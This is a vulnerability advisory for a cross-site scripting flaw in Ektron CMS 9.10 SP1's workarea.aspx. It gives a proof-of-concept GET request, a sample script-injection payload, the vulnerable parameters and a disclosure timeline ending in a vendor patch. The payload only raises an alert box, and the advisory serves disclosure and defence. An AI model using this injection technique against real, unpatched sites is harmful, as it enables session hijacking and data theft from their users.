Ektron CMS 9.10 SP1 Cross Site Scripting

`# Vulnerability type: Cross-site Scripting   
# Vendor: http://www.ektron.com/  
# Product: Ektron Content Management System  
# Affected version: =< 9.10 SP1 (Build 9.1.0.184.1.102)  
# Patched version: 9.10 SP1 (Build 9.1.0.184.1.114)  
# Credit: Jerold Hoong  
  
# PROOF OF CONCEPT (XSS)  
  
Cross-site scripting (XSS) vulnerability in workarea.aspx in Ektron CMS 9.10 SP1  
on build 9.1.0.184.1.102 and earlier allows remote authenticated users to inject  
arbitrary javascript via the page, action, folder_id and LangType parameters.  
  
GET /Test/WorkArea/workarea.aspx?page=content.aspx%27%3balert  
%28%22XSS%22%29%2f%2f&action=ViewContentByCategory&folder_id=0  
&LangType=1033 HTTP/1.1  
Host: 127.0.0.1  
User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:35.0) Gecko/20100101 Firefox/35.0  
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8  
Accept-Language: en-US,en;q=0.5  
Accept-Encoding: gzip, deflate  
.. [SNIP] ...  
Cookie: EktGUID=014949ec-36ac-4b89-9c0b-8b03ed29b0ed; EkAnalytics=0;  
ASP.NET_SessionId=zxucmt5zyugbtwrm4vseakw5;  
.. [SNIP] ...  
  
# VULNERABLE PARAMETERS:  
- page  
- action  
- folder_id  
- LangType  
  
# SAMPLE PAYLOAD  
- ';alert("XSS")//  
  
# TIMELINE  
– 07/04/2015: Vulnerability found  
– 07/04/2015: Vendor informed  
– 08/04/2015: Vendor responded and acknowledged  
– 28/05/2015: Vendor fixed the issue  
– 31/05/2015: Public disclosure  
`